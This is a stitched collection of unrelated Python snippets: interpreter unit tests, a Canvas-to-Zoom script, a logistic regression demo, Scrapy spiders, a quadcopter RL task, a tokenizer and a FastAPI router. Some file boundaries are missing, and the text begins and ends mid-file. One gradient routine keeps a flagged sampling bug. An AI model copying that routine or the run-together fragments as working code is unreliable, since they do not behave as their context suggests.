        check({'x': E, 'y': E, 'z': E}, {'x': E, 'y': E, 'z': E})
        # z was never set; unsetting it anywhere is harmless.
        e2.unsetvar('z')
        check({'x': E, 'y': E, 'z': E}, {'x': E, 'y': E, 'z': E})
        e1.unsetvar('z')
        check({'x': E, 'y': E, 'z': E}, {'x': E, 'y': E, 'z': E})
        # Setting z in e2 stays invisible to the outer environment.
        e2.setvar('z', 7)
        check({'x': E, 'y': E, 'z': E}, {'x': E, 'y': E, 'z': 7})
    #-def
#-class
class TestCommandProcessorCase(unittest.TestCase):
    """Exercises CommandProcessor: constants, stacks, run(), errors, cleanup."""
    def test_constants(self):
        """Built-in exception classes form the documented hierarchy."""
        p = CommandProcessor()
        # Null is the processor object itself.
        self.assertIs(p.Null, p)
        self.assertIsNone(p.BaseException.base())
        self.assertEqual(str(p.BaseException), 'BaseException')
        self.assertIs(p.Exception.base(), p.BaseException)
        self.assertEqual(str(p.Exception), 'Exception')
        self.assertIs(p.SyntaxError.base(), p.Exception)
        self.assertEqual(str(p.SyntaxError), 'SyntaxError')
        self.assertIs(p.NameError.base(), p.Exception)
        self.assertEqual(str(p.NameError), 'NameError')
        self.assertIs(p.TypeError.base(), p.Exception)
        self.assertEqual(str(p.TypeError), 'TypeError')
        self.assertIs(p.ValueError.base(), p.Exception)
        self.assertEqual(str(p.ValueError), 'ValueError')
        self.assertIs(p.IndexError.base(), p.Exception)
        self.assertEqual(str(p.IndexError), 'IndexError')
        self.assertIs(p.KeyError.base(), p.Exception)
        self.assertEqual(str(p.KeyError), 'KeyError')
        # Unknown constant names raise.
        with self.assertRaises(CommandProcessorError):
            p.Uvw
    #-def
    def test_given_env(self):
        """A processor constructed with an environment reads variables from it."""
        e = Environment()
        p = CommandProcessor(e)
        e.setvar('$$', 8)
        self.assertIsNone(p.acc())
        p.run([TLoad('$$')])
        self.assertEqual(p.acc(), 8)
    #-def
    def test_getenv(self):
        """TLoadEnv yields the global env at top level, a nested env in a block."""
        e = Environment()
        e.setvar('x', "<1>")
        p = CommandProcessor(e)
        self.assertIs(p.getenv(), e)
        p.run([TLoadEnv(True)])
        self.assertIs(p.acc(), e)
        p.run([
            TBlock([
                TSet('y', "<2>"), TLoadEnv(False)
            ])
        ])
        # The block environment chains to `e` but is a distinct object.
        self.assertIsNot(p.acc(), e)
        self.assertEqual(p.acc().getvar('x'), "<1>")
        self.assertEqual(p.acc().getvar('y'), "<2>")
        # The block-local variable never leaked into the outer environment.
        with self.assertRaises(CommandError):
            e.getvar('y')
    #-def
    def test_ctxstack(self):
        """Context push/pop must pair up; cmdctx finds a context via Finalizers."""
        p = CommandProcessor()
        c1 = Command()
        c2 = Command()
        ctx1 = CommandContext(c1)
        ctx2 = CommandContext(c2)
        with self.assertRaises(CommandProcessorError):
            p.popctx(ctx1)
        p.pushctx(ctx1)
        # Popping a context other than the top one is an error.
        with self.assertRaises(CommandProcessorError):
            p.popctx(ctx2)
        p.popctx(ctx1)
        with self.assertRaises(CommandProcessorError):
            p.popctx(ctx1)
        with self.assertRaises(CommandProcessorError):
            p.cmdctx(c1)
        p.pushctx(ctx1)
        # cmdctx searches pending Finalizers, not the raw context stack.
        with self.assertRaises(CommandProcessorError):
            p.cmdctx(c1)
        p.insertcode(c1, Finalizer(ctx2), Finalizer(ctx1))
        with self.assertRaises(CommandProcessorError):
            p.cmdctx(c1)
        p.insertcode(c2, Finalizer(ctx1))
        with self.assertRaises(CommandProcessorError):
            p.cmdctx(c2)
        self.assertIs(p.cmdctx(c1), ctx1)
    #-def
    def test_valstack(self):
        """Value stack: push/pop/top with precise nvals accounting."""
        p = CommandProcessor()
        self.assertEqual(p.nvals(), 0)
        with self.assertRaises(CommandProcessorError):
            p.topval()
        self.assertEqual(p.nvals(), 0)
        with self.assertRaises(CommandProcessorError):
            p.popval()
        self.assertEqual(p.nvals(), 0)
        p.pushval(1)
        self.assertEqual(p.nvals(), 1)
        p.pushval(2)
        self.assertEqual(p.nvals(), 2)
        # setacc does not touch the stack; pushacc moves acc onto it.
        p.setacc(3)
        self.assertEqual(p.nvals(), 2)
        p.pushacc()
        self.assertEqual(p.nvals(), 3)
        self.assertEqual(p.topval(), 3)
        self.assertEqual(p.nvals(), 3)
        self.assertEqual(p.popval(), 3)
        self.assertEqual(p.nvals(), 2)
        self.assertEqual(p.topval(), 2)
        self.assertEqual(p.nvals(), 2)
        self.assertEqual(p.popval(), 2)
        self.assertEqual(p.nvals(), 1)
        self.assertEqual(p.topval(), 1)
        self.assertEqual(p.nvals(), 1)
        self.assertEqual(p.popval(), 1)
        self.assertEqual(p.nvals(), 0)
        with self.assertRaises(CommandProcessorError):
            p.topval()
        self.assertEqual(p.nvals(), 0)
        with self.assertRaises(CommandProcessorError):
            p.popval()
        self.assertEqual(p.nvals(), 0)
    #-def
    def test_acc(self):
        """Accumulator starts as None and holds whatever setacc stored."""
        p = CommandProcessor()
        self.assertIsNone(p.acc())
        p.setacc("ax")
        self.assertEqual(p.acc(), "ax")
    #-def
    def test_run(self):
        """Literals are coerced to runtime values; unsupported objects raise."""
        p = CommandProcessor()
        p.run([True])
        self.assertIs(p.acc(), True)
        p.run([False])
        self.assertIs(p.acc(), False)
        p.run([1])
        self.assertEqual(p.acc(), 1)
        p.run([1.25])
        self.assertEqual(p.acc(), 1.25)
        p.run(["abc"])
        self.assertEqual(p.acc(), "abc")
        p.run([Pair(3, 7)])
        self.assertIsInstance(p.acc(), Pair)
        self.assertEqual(p.acc(), (3, 7))
        p.run([List("xyz")])
        self.assertIsInstance(p.acc(), List)
        self.assertEqual(p.acc(), [ 'x', 'y', 'z' ])
        p.run([HashMap({'a': 0.5, 1: 'x'})])
        self.assertIsInstance(p.acc(), HashMap)
        self.assertEqual(p.acc(), {'a': 0.5, 1: 'x'})
        ut = UserType()
        p.run([ut])
        self.assertIsInstance(p.acc(), UserType)
        self.assertIs(p.acc(), ut)
        p.run([Procedure(1, 2, 3, 4, 5, 6, 7)])
        self.assertIsInstance(p.acc(), Procedure)
        self.assertEqual(p.acc(), (1, 2, 3, 4, 5, 6, 7))
        # Plain 2-tuples become Pairs; any other tuple arity is rejected.
        p.run([(2, 5)])
        self.assertIsInstance(p.acc(), Pair)
        self.assertEqual(p.acc(), (2, 5))
        with self.assertRaises(CommandProcessorError):
            p.run([()])
        with self.assertRaises(CommandProcessorError):
            p.run([(1,)])
        with self.assertRaises(CommandProcessorError):
            p.run([(1, 3, -1)])
        with self.assertRaises(CommandProcessorError):
            p.run([(1, 3, -1, 0.25)])
        # Plain lists and dicts are converted to List/HashMap.
        p.run([[1, 2, 3]])
        self.assertIsInstance(p.acc(), List)
        self.assertEqual(p.acc(), [1, 2, 3])
        p.run([{0.5: "cc", -4: (1,), ('a', 3): 0.25}])
        self.assertIsInstance(p.acc(), HashMap)
        self.assertEqual(p.acc(), {0.5: "cc", -4: (1,), ('a', 3): 0.25})
        # None maps to the processor's Null singleton.
        p.run([None])
        self.assertIs(p.acc(), p.Null)
        p.run([p.Null])
        self.assertIs(p.acc(), p.Null)
        with self.assertRaises(CommandProcessorError):
            p.run([CommandProcessor()])
    #-def
    def test_event_handling(self):
        """Errors dispatch to the innermost matching try/catch handler."""
        p = CommandProcessor()
        c = Command()
        _c = Command()
        ctx = CommandContext(c)
        _ctx = CommandContext(_c)
        # Unhandled NameError ('?' is undefined) aborts the run.
        with self.assertRaises(CommandProcessorError):
            p.run([TLoad('?'), TSet('x', -1)])
        with self.assertRaises(CommandProcessorError):
            p.run([TLoad('?'), c, _c, c])
        # First matching handler wins (NameError here).
        p.run([
            TTryCatch([
                TLoad('?')
            ], [
                ('TypeError', "", [TSet('et', 1)]),
                ('NameError', "", [TSet('et', 2)])
            ])
        ])
        self.assertEqual(p.getenv().getvar('et'), 2)
        # A base-class handler listed first shadows more specific ones.
        p.run([
            TTryCatch([
                TLoad('?')
            ], [
                ('BaseException', "", [TSet('et', 0)]),
                ('TypeError', "", [TSet('et', 1)]),
                ('NameError', "", [TSet('et', 2)])
            ])
        ])
        self.assertEqual(p.getenv().getvar('et'), 0)
        # An undefined handler-class name makes the dispatch itself fail.
        with self.assertRaises(CommandProcessorError):
            p.run([
                TTryCatch([
                    TLoad('?')
                ], [
                    ('_TypeError', "", [TSet('et', 1)]),
                    ('NameError', "", [TSet('et', 2)])
                ])
            ])
        # ...unless a matching handler is found before the bad name is reached.
        p.run([
            TTryCatch([
                TLoad('?')
            ], [
                ('NameError', "", [TSet('et', 3)]),
                ('_NameError', "", [TSet('et', 4)])
            ])
        ])
        self.assertEqual(p.getenv().getvar('et'), 3)
        # No match in the inner try/catch: the outer one handles the error.
        p.run([
            TTryCatch([
                TTryCatch([
                    TLoad('?')
                ], [
                    ('TypeError', "", [TSet('et', 5)]),
                    ('_Error', "", [TSet('et', 6)])
                ])
            ], [
                ('NameError', "", [TSet('et', 7)])
            ])
        ])
        self.assertEqual(p.getenv().getvar('et'), 7)
        # No handler matches anywhere: the error escapes.
        with self.assertRaises(CommandProcessorError):
            p.run([
                TTryCatch([
                    TTryCatch([
                        TLoad('?')
                    ], [
                        ('TypeError', "", [TSet('et', 5)]),
                        ('_Error', "", [TSet('et', 6)])
                    ])
                ], [
                    ('TypeError', "", [TSet('et', 7)])
                ])
            ])
        # A stray Finalizer inside the protected code is itself an error.
        with self.assertRaises(CommandProcessorError):
            p.run([
                TTryCatch([
                    TLoad('?'), Finalizer(Command())
                ], [
                    ('NameError', "", [])
                ])
            ])
        # Return outside a procedure frame is invalid in various stack states.
        with self.assertRaises(CommandProcessorError):
            p.run([Return()])
        with self.assertRaises(CommandProcessorError):
            p.popctx(ctx)
        with self.assertRaises(CommandProcessorError):
            p.run([Return(), c, c, c])
        p.pushctx(_ctx)
        with self.assertRaises(CommandProcessorError):
            p.run([Return(), c, c, c, Finalizer(ctx)])
        p.popctx(_ctx)
        with self.assertRaises(CommandProcessorError):
            p.popctx(_ctx)
        with self.assertRaises(CommandProcessorError):
            p.run([Return(), c, c, c, Finalizer(_ctx)])
        p.pushctx(_ctx)
        with self.assertRaises(CommandProcessorError):
            p.run([Return(), c, c, c, Finalizer(_ctx), c, c])
        p.popctx(_ctx)
        # Return inside a called Lambda is legal and yields Null.
        p.run([
            Call(Lambda([], False, [Return()], []))
        ])
        self.assertIs(p.acc(), p.Null)
    #-def
    def test_cleanup(self):
        """Without cleanup(), failed runs leave stacks/acc intact; with it, reset."""
        le = LoggingEnv()
        p = LoggingProcessor(le)
        try:
            p.pushval(0)
            p.pushval(7)
            p.setacc('z')
            p.run([
                TLogBlock(1, [
                    TLogBlock(2, [
                        CommandProcessor(),
                        TSet('x', 'y'),
                        CommandProcessor(),
                        TSet('x', 'y')
                    ]),
                    TSet('x', 'y')
                ]),
                TSet('x', 'y')
            ])
        except CommandProcessorError:
            pass
        # No cleanup: only the opening markers were logged, state survives.
        self.assertEqual(p.log, [ "<1>", "<2>" ])
        self.assertEqual(p.popval(), 7)
        self.assertEqual(p.popval(), 0)
        with self.assertRaises(CommandProcessorError):
            p.popval()
        self.assertEqual(p.acc(), 'z')
        le = LoggingEnv()
        p = LoggingProcessor(le)
        try:
            p.pushval(0)
            p.pushval(7)
            p.setacc('z')
            p.run([
                TLogBlock(1, [
                    TLogBlock(2, [
                        CommandProcessor(),
                        TSet('x', 'y'),
                        CommandProcessor(),
                        TSet('x', 'y')
                    ]),
                    TSet('x', 'y')
                ]),
                TSet('x', 'y')
            ])
        except CommandProcessorError:
            p.cleanup()
        # cleanup() ran the pending finalizers and reset stack and accumulator.
        self.assertEqual(p.log, [ "<1>", "<2>", "</2>", "</1>" ])
        with self.assertRaises(CommandProcessorError):
            p.popval()
        self.assertIsNone(p.acc())
    #-def
    def test_impls(self):
        """Smoke-test the print implementation hook."""
        p = CommandProcessor()
        p.print_impl("abc")
    #-def
#-class
def suite():
    """Build the test suite for this module.

    Uses unittest.TestLoader instead of unittest.makeSuite, which is
    deprecated since Python 3.11 and removed in Python 3.13.
    """
    loader = unittest.defaultTestLoader
    return unittest.TestSuite([
        loader.loadTestsFromTestCase(TestMetaInfoCase),
        loader.loadTestsFromTestCase(TestEnvironmentCase),
        loader.loadTestsFromTestCase(TestCommandProcessorCase),
    ])
#-def
|
from canvasapi import Canvas
from canvas_zoom_breakouts.canvas_zoom_breakouts import canvas_zoom_breakouts
# Base URL of the Canvas instance to query.
CANVAS_API_URL="https://canvas.iastate.edu"
# See: https://canvasapi.readthedocs.io/en/stable/
# Obtain CANVAS_API_KEY by going to your Canvas
# account settings, scrolling to "Approved Integrations"
# and selecting "New Access Token" These tokens will last
# according to the expiration selected when you create
# them.
CANVAS_API_KEY="INSERT_CANVAS_API_KEY_HERE"
course_name="Enter Course Name Here"
group_category_name="Canvas group" # Name of the Canvas group set of interest
email_suffix="@iastate.edu" # ... suffix that converts User ID's to email addresses registered with Zoom
canvas = Canvas(CANVAS_API_URL,CANVAS_API_KEY)
# Fetch the course/group data and write the Zoom breakout-room import CSV
# to "<course_name>_zoom_breakouts.csv".
(course,
canvpart_by_netid,
groups_by_name,
zoom_csvfile_string) = canvas_zoom_breakouts(canvas,email_suffix,course_name,group_category_name,course_name+"_zoom_breakouts.csv")
|
# _*_ coding: utf-8 _*_
from numpy import *
## Logistic regression searches for a best-fit parameter vector, much like a
## linear model, but fits the data with gradient-based optimization,
## which makes it well suited to binary classification with several features.
class LogisticDemo:
    """Logistic-regression demo: fit weights by gradient ascent and classify.

    Expects `from numpy import *` to be in scope (mat, ones, exp, random, ...).
    """

    def sigmoid(self, inX):
        """Logistic function; maps a scalar or array to (0, 1) elementwise."""
        return 1.0 / (1 + exp(-inX))

    def fit_gradAscent(self, dataMatIn, classLabels):
        """Batch gradient ascent with a fixed 500 iterations.

        dataMatIn: m x n samples (list of lists or array-like).
        classLabels: m binary labels (0/1).
        Returns the fitted weights as a flat ndarray of length n.
        """
        dataMatrix = mat(dataMatIn)              # m x n NumPy matrix
        labelMat = mat(classLabels).transpose()  # m x 1 column vector
        m, n = shape(dataMatrix)
        alpha = 0.001      # learning rate
        maxCycles = 500    # fixed iteration count
        weights = ones((n, 1))
        for k in range(maxCycles):               # heavy on matrix operations
            h = self.sigmoid(dataMatrix * weights)  # m x 1 predictions
            error = (labelMat - h)                  # prediction error
            weights = weights + alpha * dataMatrix.transpose() * error
        # Convert the matrix result into a flat ndarray.
        weights = asarray(weights).reshape(-1)
        return weights

    def fit_stocGradAscent0(self, dataMatrix, classLabels):
        """Plain stochastic gradient ascent: a single pass over the samples."""
        m, n = shape(dataMatrix)
        alpha = 0.01
        weights = ones(n)  # initialize to all ones
        for i in range(m):
            h = self.sigmoid(sum(dataMatrix[i] * weights))
            error = classLabels[i] - h
            weights = weights + alpha * error * dataMatrix[i]
        return weights

    def fit_stocGradAscent1(self, dataMatrix, classLabels, numIter=150):
        """Improved stochastic gradient ascent with a decaying step size.

        Fix: the original used `dataIndex = range(m)`; `del` on a range
        object raises TypeError on Python 3, so a real list is needed.
        """
        m, n = shape(dataMatrix)
        weights = ones(n)  # initialize to all ones
        for j in range(numIter):
            dataIndex = list(range(m))
            for i in range(m):
                # alpha decays with iterations but the constant keeps it > 0.
                alpha = 4 / (1.0 + j + i) + 0.0001
                randIndex = int(random.uniform(0, len(dataIndex)))
                h = self.sigmoid(sum(dataMatrix[randIndex] * weights))
                error = classLabels[randIndex] - h
                weights = weights + alpha * error * dataMatrix[randIndex]
                # NOTE(review): the sample is addressed as dataMatrix[randIndex]
                # (an index into the full matrix) while the deletion shrinks
                # dataIndex -- kept as-is to preserve the original sampling.
                del dataIndex[randIndex]
        return weights

    def plotBestfit(self, weights, dataMat, labelMat):
        """Scatter both classes and draw the fitted decision boundary."""
        import numpy as np
        import matplotlib.pyplot as plt
        dataArr = array(dataMat)
        n = shape(dataArr)[0]
        xcord1 = []
        ycord1 = []
        xcord2 = []
        ycord2 = []
        for i in range(n):
            if int(labelMat[i]) == 1:
                xcord1.append(dataArr[i, 1])
                ycord1.append(dataArr[i, 2])
            else:
                xcord2.append(dataArr[i, 1])
                ycord2.append(dataArr[i, 2])
        fig = plt.figure()
        ax = fig.add_subplot(111)
        ax.scatter(xcord1, ycord1, s=30, c='red', marker='s')
        ax.scatter(xcord2, ycord2, s=30, c='green')
        x = np.arange(-3.0, 3.0, 0.1)
        a = float(weights[0])
        b = float(weights[1])
        c = float(weights[2])
        # Boundary: w0 + w1*x + w2*y = 0  =>  y = (-w0 - w1*x) / w2
        y = ( -a - b * x) / c
        ax.plot(x, y)
        plt.xlabel('X1')
        plt.ylabel('X2')
        plt.show()

    def predict(self, inX, weights):
        """Classify inX: probability above 0.5 maps to 1.0, otherwise 0.0."""
        prob = self.sigmoid(sum(inX * weights))
        if prob > 0.5:
            return 1.0
        else:
            return 0.0
|
import os
import sys
import parseEmail
from collections import defaultdict
def generateAllEgdeList(folderName,value=['To', 'From'],all_sent=['sent','_sent_mail','sent_items','_sent'],start_date='1 1 1998',end_date='31 12 2002'):
    """Return an edgeList for all the emails.

    value: the different sections of the email; can be user specified;
           defaults to ['To', 'From']
    all_sent: directories holding the sent emails; can be user specified;
           defaults to ['sent','_sent_mail','sent_items','_sent']
    start_date: minimum date ('month day year') an email may have; default '1 1 1998'
    end_date: maximum date ('month day year') an email may have; default '31 12 2002'
    Returned type: a default dictionary with key 'egdeList'
    """
    # Local accumulator replaces the old function-attribute storage, which
    # persisted between calls.
    edges = defaultdict(list)
    if type(all_sent) is not list:
        all_sent = [all_sent]
    for item in os.listdir(folderName):
        # os.path.join picks the platform separator, replacing the os.name branch.
        userEdges = generateEgdeListForUser(
            os.path.join(folderName, item), value, all_sent, start_date, end_date)
        # NOTE(review): the accumulated key is 'egdeList' (sic) while the
        # per-user key is 'edgeList'; both spellings are preserved because
        # callers may depend on them.
        edges['egdeList'].extend(userEdges['edgeList'])
    return edges
def generateEgdeListForUser(folderName,value=['To', 'From'],all_sent=['sent','_sent_mail','sent_items','_sent'],start_date='1 1 1998',end_date='31 12 2002'):
    """Generate an edgeList for a user.

    value: the different sections of the email; can be user specified;
           defaults to ['To', 'From']
    all_sent: directories holding the sent emails; can be user specified;
           defaults to ['sent','_sent_mail','sent_items','_sent']
    start_date: minimum date ('month day year') an email may have; default '1 1 1998'
    end_date: maximum date ('month day year') an email may have; default '31 12 2002'
    Returned type: a default dictionary with keys 'From', 'To', 'edgeList'
    """
    if type(all_sent) is not list:
        all_sent = [all_sent]
    # Local result replaces the old function-attribute storage, which
    # persisted between calls.
    edge = defaultdict(list)
    parsed = parseEmail.parseUserEmails(folderName, value, all_sent, start_date, end_date)
    edge['From'] = parsed['From']
    edge['To'] = parsed['To']
    # Pair every sender with the matching recipient of the same message.
    for i in range(len(edge['From'])):
        for y in range(len(edge['From'][i])):
            edge['edgeList'].append(edge['From'][i][y] + ', ' + edge['To'][i][y])
    return edge
|
# Print the greeting a fixed number of times; a bounded for-loop replaces
# the original while-True loop with its misspelled manual counter
# ("loop_couter").
for _ in range(3):
    print("Hello world")
|
from Log import Log
import numpy as np
from physics_sim_fixed import PhysicsSim
class Task():
    """Task (environment) that defines the goal and provides feedback to the agent."""
    def __init__(self, init_pose=None, init_velocities=None,
        init_angle_velocities=None, runtime=10., target_pos=None, log=None):
        """Initialize a Task object.
        Params
        ======
            log (Log): Reference to the log utility.
            init_pose: initial position of the quadcopter in (x,y,z) dimensions and the Euler angles
            init_velocities: initial velocity of the quadcopter in (x,y,z) dimensions
            init_angle_velocities: initial radians/second for each of the three Euler angles
            runtime: time limit for each episode - originally only 5
            target_pos: target/goal (x,y,z) position for the agent
        """
        # Simulation
        self.sim = PhysicsSim(init_pose, init_velocities, init_angle_velocities, runtime)
        # Each env step advances the sim `action_repeat` times and stacks the poses.
        self.action_repeat = 3
        self.state_size = self.action_repeat * 6
        # Rotor speed bounds and count (4 rotors).
        self.action_low = 1
        self.action_high = 900
        self.action_size = 4
        # Goal
        # NOTE(review): the default target is 6-dimensional (pose incl. Euler
        # angles) although the docstring says (x,y,z) -- confirm intended shape.
        self.target_pos = target_pos if target_pos is not None else np.array([0., 0., 10., 0., 0., 0.])
    def get_reward(self):
        """Uses current pose of sim to return reward."""
        # Tuning knobs for the reward variants below.
        alpha = 0.2
        max_reward = 1.0
        pos_reward = 10.
        reward_spread = 1.0
        # Earlier reward formulations kept for experiment history (v1-v13).
        #reward = 1.-.3*(abs(self.sim.pose[:3] - self.target_pos)).sum() # Original
        #reward = 1 / np.exp(np.sum(np.abs(self.sim.pose - self.target_pos)*alpha)) #v1
        #reward = 1.-.3*(abs(self.sim.pose[:3] - self.target_pos)).sum() #v2
        #reward = 1.-alpha*(abs(self.sim.pose - self.target_pos)).sum() #v3
        #reward = 30.-alpha*( pos_reward*(abs(self.sim.pose[:3] - self.target_pos[:3])) + abs(self.sim.pose[3:] - self.target_pos[3:])).sum() #v4, 5
        #reward = 1 / np.exp(np.sum(np.abs(self.sim.pose - self.target_pos)*alpha)) #v6
        #reward = np.tanh(max_reward - np.sqrt(np.abs(self.sim.pose - self.target_pos).sum())) #v7
        #reward = 1.-alpha*((self.target_pos - self.sim.pose) / reward_spread).sum() #v8
        #reward = np.tanh(1.-alpha*((self.target_pos - self.sim.pose) / reward_spread).sum()) #v9
        #reward = np.tanh(max_reward-alpha*(abs(self.sim.pose - self.target_pos)).sum()) / reward_spread #v10
        #reward = np.tanh((max_reward-alpha*(abs(self.sim.pose - self.target_pos)).sum()) / reward_spread) #v10
        #reward = np.tanh((max_reward-alpha*(pos_reward * abs(self.sim.pose[:3] - self.target_pos[:3]) + abs(self.sim.pose[3:] - self.target_pos[3:])).sum()) / reward_spread) #v11
        # Active variant (v12): bounded reward decreasing with total pose error.
        reward = np.tanh(max_reward-alpha*((abs(self.sim.pose - self.target_pos)).sum())) / reward_spread #v12
        #reward += pos_reward - np.abs(self.sim.pose[2] - self.target_pos[2]) #Special Z axis reward
        #reward = np.tanh((max_reward-alpha*((abs(self.sim.pose - self.target_pos)).sum())) / reward_spread) #v13
        return reward
    def step(self, rotor_speeds):
        """Uses action to obtain next state, reward, done."""
        reward = 0
        pose_all = []
        # Repeat the same action and accumulate reward; state is the stacked poses.
        for _ in range(self.action_repeat):
            done = self.sim.next_timestep(rotor_speeds) # update the sim pose and velocities
            reward += self.get_reward()
            pose_all.append(self.sim.pose)
        next_state = np.concatenate(pose_all)
        return next_state, reward, done
    def reset(self):
        """Reset the sim to start a new episode."""
        self.sim.reset()
        # Initial state repeats the starting pose `action_repeat` times.
        state = np.concatenate([self.sim.pose] * self.action_repeat)
        return state
from paddle.utils import try_import
from paddlenlp.transformers.albert.tokenizer import AlbertEnglishTokenizer
class ReformerTokenizer(AlbertEnglishTokenizer):
    """SentencePiece tokenizer for Reformer, reusing AlbertEnglishTokenizer.

    Reformer adds no special tokens when combining sequences and uses all-zero
    # token type ids for the first segment (see the overrides below).
    """
    resource_files_names = {
        "sentencepiece_model_file": "spiece.model",
    }
    pretrained_resource_files_map = {
        "sentencepiece_model_file": {
            "reformer-crime-and-punishment": "https://huggingface.co/google/reformer-crime-and-punishment/resolve/main/spiece.model",
        },
    }
    pretrained_init_configuration = {
        "reformer-crime-and-punishment": {"do_lower_case": False},
    }
    def __init__(
        self,
        sentencepiece_model_file,
        do_lower_case=False,
        remove_space=True,
        keep_accents=False,
        eos_token="</s>",
        unk_token="<unk>",
        **kwargs
    ):
        """Load the SentencePiece model and record normalization options."""
        self.do_lower_case = do_lower_case
        self.remove_space = remove_space
        self.keep_accents = keep_accents
        self.sentencepiece_model_file = sentencepiece_model_file
        # sentencepiece is imported lazily so it is only required at use time.
        spm = try_import("sentencepiece")
        self.sp_model = spm.SentencePieceProcessor()
        self.sp_model.Load(sentencepiece_model_file)
    def build_inputs_with_special_tokens(self, token_ids_0, token_ids_1=None):
        """Concatenate the sequences; Reformer inserts no special tokens."""
        if token_ids_1 is None:
            return token_ids_0
        return token_ids_0 + token_ids_1
    def create_token_type_ids_from_sequences(self,
                                             token_ids_0,
                                             token_ids_1=None):
        """Return 0s for the first sequence and 1s for the optional second."""
        if token_ids_1 is None:
            return len(token_ids_0) * [0]
        return len(token_ids_0) * [0] + len(token_ids_1 ) * [1]
from utils.cab import Cab
from utils.googlemaps import GoogleMaps
from utils.execute_queries import ExecRawQuery
|
# Write a Python program to guess a number between 1 to 9. Go to the editor
# Note : User is prompted to enter a guess. If the user guesses wrong then the prompt appears again until the guess is correct, on successful guess, user will get a "Well guessed!" message, and the program will exit.
import random

# Pick the secret number once, then keep prompting until it is guessed,
# as the exercise statement above requires (the previous version checked a
# single input against a fixed range and never looped).
target = random.randint(1, 9)
while int(input("Guess a number between 1 and 9: ")) != target:
    print("Wrong guess, try again.")
print("Well guessed!")
|
import scrapy
from scrapy.exceptions import CloseSpider
from scrapy.loader import ItemLoader
from ..items import MerkantibankItem
from itemloaders.processors import TakeFirst
class MerkantibankSpider(scrapy.Spider):
    """Crawls Merkantibank news year pages (2016 onward) and scrapes each post."""
    name = 'merkantibank'
    start_urls = ['http://www.merkantibank.com/English/corporate/news/2016/default.aspx']
    # Year of the listing page currently being crawled; incremented per page.
    page = 2016
    def parse(self, response):
        """Follow every post on the year page, then advance to the next year."""
        post_links = response.xpath('//a[@class="ModuleHeadlineLink"]/@href').getall()
        yield from response.follow_all(post_links, self.parse_post)
        self.page += 1
        next_page = f'http://www.merkantibank.com/English/corporate/news/{self.page}/default.aspx'
        # An empty year page means the archive is exhausted.
        if not post_links:
            raise CloseSpider('no more pages')
        yield response.follow(next_page, self.parse)
    def parse_post(self, response):
        """Extract title, flattened description text, and date from one post."""
        title = response.xpath('//h1[@class="ModuleTitle ModuleDetailHeadline"]//text()').get()
        description = response.xpath('//div[@class="xn-content"]//text()[normalize-space()]').getall()
        # Collapse the text nodes into a single whitespace-normalized string.
        description = [p.strip() for p in description]
        description = ' '.join(description).strip()
        date = response.xpath('//span[@class="ModuleDate"]/text()').get()
        item = ItemLoader(item=MerkantibankItem(), response=response)
        item.default_output_processor = TakeFirst()
        item.add_value('title', title)
        item.add_value('description', description)
        item.add_value('date', date)
        return item.load_item()
import socket
import protocol_utils as protocolUtils
socket_instance = socket.socket()
# Connect to the calculator server using the shared protocol settings.
socket_instance.connect((protocolUtils.host, protocolUtils.port))
num1 = input("Ingrese un numero: ")
num2 = input("Ingrese un numero: ")
op = input("Ingrese la operacion a realizar: ")
# Encode the two operands and the operation with the shared message format.
message_builder = protocolUtils.MessageBuilder(num1, num2, op)
socket_instance.send(message_builder.message_builder().encode())
# Read the (up to 1024-byte) response and display it.
result = socket_instance.recv(1024)
print("Resultado de la operacion fue ", result.decode("utf-8"))
socket_instance.close()
|
import scrapy  # NOTE(review): apparently unused here; kept in case import side effects matter -- TODO confirm
import subprocess

# Run the BillBoard spider. subprocess.run with an argument list replaces
# os.system: no shell-string parsing, and the exit status is inspectable.
subprocess.run(["scrapy", "crawl", "BillBoard_Spider"])
#subprocess.run(["scrapy", "crawl", "BoardSongs_Spider"])
#subprocess.run(["scrapy", "crawl", "Music_Spider"])
|
#
# Copyright (C) 2020-2021 Arm Limited or its affiliates and Contributors. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
#
"""Module in charge of handling SPDX documents.
SPDX file (i.e. tag-value format)
https://github.com/OpenChain-Project/curriculum/blob/master/guides/including_license_info.rst
https://github.com/david-a-wheeler/spdx-tutorial#spdx-files
https://github.com/OpenChain-Project/curriculum/blob/master/guides/reusing_software.md
https://github.com/vmware/tern/blob/c9a0c83369b92df58f7f80842aa15da5f63ed983/docs/spdx-tag-value-overview.md
Examples:
- https://spdx.org/spdx-tagvalue-example
- https://github.com/spdx/tools/blob/master/Examples/SPDXTagExample-v2.1.spdx
"""
|
from typing import List
from fastapi import APIRouter, Depends, HTTPException
from pydantic import PositiveInt
from sqlalchemy.orm import Session
from . import crud, schemas
from .database import get_db
router = APIRouter()
@router.get("/suppliers/{id}", response_model=schemas.Supplier2)
async def get_supplier(id: PositiveInt, db: Session = Depends(get_db)):
    """Return supplier *id*, or respond 404 if it does not exist."""
    db_supplier = crud.get_supplier(db, id)
    if db_supplier is None:
        raise HTTPException(status_code=404, detail="Supplier not found")
    return db_supplier
@router.get("/suppliers", response_model=List[schemas.Supplier])
async def get_suppliers(db: Session = Depends(get_db)):
    """Return all suppliers."""
    return crud.get_suppliers(db)
@router.get("/suppliers/{id}/products")
async def get_suppliers_products(id: PositiveInt, db: Session = Depends(get_db)):
    """Return the products of supplier *id*, or respond 404 if it is missing."""
    db_supplier = crud.get_supplier(db, id)
    if db_supplier is None:
        raise HTTPException(status_code=404, detail="Supplier not found")
    rows = crud.get_suppliers_products(db, id)
    # Fix: the comprehension variable used to be named `db`, shadowing the
    # database session parameter; renamed to `row`.
    return [
        {
            "ProductID": row['ProductID'],
            'ProductName': f"{row['ProductName']}",
            'Category': {
                'CategoryID': row['CategoryID'],
                'CategoryName': f"{row['CategoryName']}",
            },
            'Discontinued': row['Discontinued'],
        }
        for row in rows
    ]
@router.post("/suppliers", response_model=schemas.Supplier2, status_code=201)
async def post_supplier(new_supplier: schemas.SupplierPost, db: Session = Depends(get_db)):
    """Create a supplier from the posted payload and return it with 201."""
    return crud.create_supplier(db, new_supplier)
@router.put("/suppliers/{id}", response_model=schemas.Supplier2)
async def put_supplier(id: PositiveInt, put_supplier: schemas.SupplierPut, db: Session = Depends(get_db)):
    """Update supplier `id` with the given payload; 404 if it does not exist."""
    if crud.get_supplier(db, id) is None:
        raise HTTPException(status_code=404, detail="Supplier not found")
    return crud.put_supplier(db, id, put_supplier)
@router.delete("/suppliers/{id}", status_code=204)
async def delete_supplier(id: PositiveInt, db: Session = Depends(get_db)):
    """Delete supplier `id`; respond 404 if absent, empty 204 on success."""
